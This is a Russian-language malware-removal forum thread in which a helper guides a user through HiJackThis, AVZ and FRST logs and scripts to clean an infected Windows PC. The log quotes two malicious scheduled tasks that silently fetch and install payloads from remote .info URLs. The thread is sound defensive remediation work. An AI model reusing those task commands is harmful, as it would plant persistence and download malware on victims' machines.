Junior Member
Вес репутации
27
Вредоносное ПО
Добрый день!
Под пользователем словившем вирус:
жутко тормозит комп процессами типа svhost Закрывается браузер при поисковом запроси по типу: AVZ Закрывается проводник с папкой содержащей AVZ При использовании Cureit - удалении\перемещения в карантин зараженных файл винда падает в синий экран (или как он наывается в вин 10)
Autologger запустил из под резервного пользователя, лог во вложении. Просьба по возможности помочь! Спасибо.
Вложения
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Mitama0 , спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи .
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект .
Здравствуйте,
HiJackThis (из каталога autologger )профиксить
Код:
O21 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive1 - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive2 - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive3 - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive4 - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive5 - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive6 - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive1 - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive2 - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive3 - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive4 - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive5 - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers: OneDrive6 - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O22 - Task: \Microsoft\Windows\EDP\EDP App Launch Task - {35EF4182-F900-4632-B072-8639E4478A61},AppLaunch - (no file)
O22 - Task: \Microsoft\Windows\EDP\EDP Auth Task - {35EF4182-F900-4632-B072-8639E4478A61},ReAuth - (no file)
O22 - Task: {E6E98738-5A91-5680-BD8C-BBB2477CAEB0} - C:\Users\Evgenii\AppData\Roaming\vTzQTEpy.exe /q /i http://freshrefreshnerer24rb.info/65O07KjJaGL.RNb
O22 - Task: {EAD31ECB-9D8C-91DD-5692-3C185FBAA199} - C:\Windows\SysWOW64\XYYXLSZAeBy.exe /q /i http://freshrefreshnerer24.info/rH66fks60f3.W38
AVZ выполнить следующий скрипт .
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
Код:
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Users\Evgenii\AppData\Roaming\vTzQTEpy.exe','');
QuarantineFile('C:\Windows\SysWOW64\XYYXLSZAeBy.exe','');
QuarantineFile('C:\Users\Evgenii\AppData\Local\Temp\2877587d.sys','');
QuarantineFile('C:\ProgramData\TaskbarWindows\enplus.exe','');
DeleteFile('C:\Windows\SysWOW64\XYYXLSZAeBy.exe','32');
DeleteFile('C:\Users\Evgenii\AppData\Roaming\vTzQTEpy.exe','32');
ExecuteFile('schtasks.exe', '/delete /TN "{E6E98738-5A91-5680-BD8C-BBB2477CAEB0}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "{EAD31ECB-9D8C-91DD-5692-3C185FBAA199}" /F', 0, 15000, true);
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.
После перезагрузки:
- Выполните в AVZ:
Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин " вверху темы.
- Подготовьте лог AdwCleaner и приложите его в теме.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
27
Файл карантина добавил, спасибо!
Junior Member
Вес репутации
27
Выполнил еще раз аутологгер
Вложения
Ну необходим лог AdwCleaner
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
27
Затупил, не дочитал на радостях.
Вложения
- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание : необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5" .
Нажмите кнопку Scan . После окончания сканирования будет создан отчет (FRST.txt ) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt ). Пожалуйста, прикрепите его в следующем сообщении.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
27
Вложения
Удалите IObit через установку программ в панели упраления.
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
CreateRestorePoint:
CloseProcesses:
File: D:\Program Files (x86)\Nox\bin\nox_adb.exe
CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [indjgiebmakhmnaplnlnanodkfiejfjd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lhemechcanjmilllmccjbjldonmnnjjj] - hxxps://clients2.google.com/service/update2/crx
File: C:\ProgramData\TaskbarWindows\enplus.exe
File: C:\Windows\system32\TesSafe.sys
File: C:\Users\Evgenii\AppData\Local\Temp\2877587d.sys
File: C:\Windows\SysWOW64\Drivers\vdmzntiy.sys
2018-04-17 20:09 - 2018-04-17 20:09 - 000000000 ____D C:\Windows\IObit
2018-04-17 20:09 - 2018-04-17 20:09 - 000000000 ____D C:\Users\Все пользователи\IObit
2018-04-17 20:09 - 2018-04-17 20:09 - 000000000 ____D C:\Users\Evgenii\AppData\LocalLow\IObit
2018-04-17 20:09 - 2018-04-17 20:09 - 000000000 ____D C:\ProgramData\IObit
2018-04-17 20:08 - 2018-04-17 20:14 - 000000000 ____D C:\Users\Evgenii\AppData\Roaming\IObit
Reboot:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt) . Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен .
Код:
CHR res: Infected resources.pak (Adware script). Reinstall Chrome. <==== ATTENTION
Переустановить Chrome (с предварительным удалением и сохранением нужных вкладок или данных)
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
27
Хром удалил через панель управления, установил новый
Вложения
Приложите новые логи FRST.
Уточните пожалуйста Tescent сами ранее ставили (замечены драйвер от Tescent в системе)?
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
27
Tescent - не припоминаю, пытался восполнить память гуглом не нашел информацию по нему. Скорее всего не устанавливал.Из последнего "ScpToolkit Settings Manager" - позволяет использовать джостик PS3 на ПК.
Вложения
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
CreateRestorePoint:
CloseProcesses:
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/"
S3 TesSafe; C:\Windows\system32\TesSafe.sys [1143400 2018-04-22] (TENCENT)
S3 46e089f2d9242fd9; \??\C:\Users\Evgenii\AppData\Local\Temp\2877587d.sys [X] <==== ATTENTION
Folder: C:\ProgramData\ProductData
Reboot:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt) . Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен .
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
27
Вложения
Сообщите, что с проблемой?
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member
Вес репутации
27
Сообщение от
SQ
Сообщите, что с проблемой?
Всё отлично, процессов загружающих процессор не наблюдаю
В завершение:
1.
Пожалуйста, запустите adwcleaner.exe В меню Настройки - Удалить AdwCleaner - выберите Удалить . Подтвердите удаление, нажав кнопку: Да.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.
Остальные утилиты лечения и папки можно просто удалить.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Итог лечения
Статистика проведенного лечения:
Получено карантинов: 1 Обработано файлов: 3 В ходе лечения вредоносные программы в карантинах не обнаружены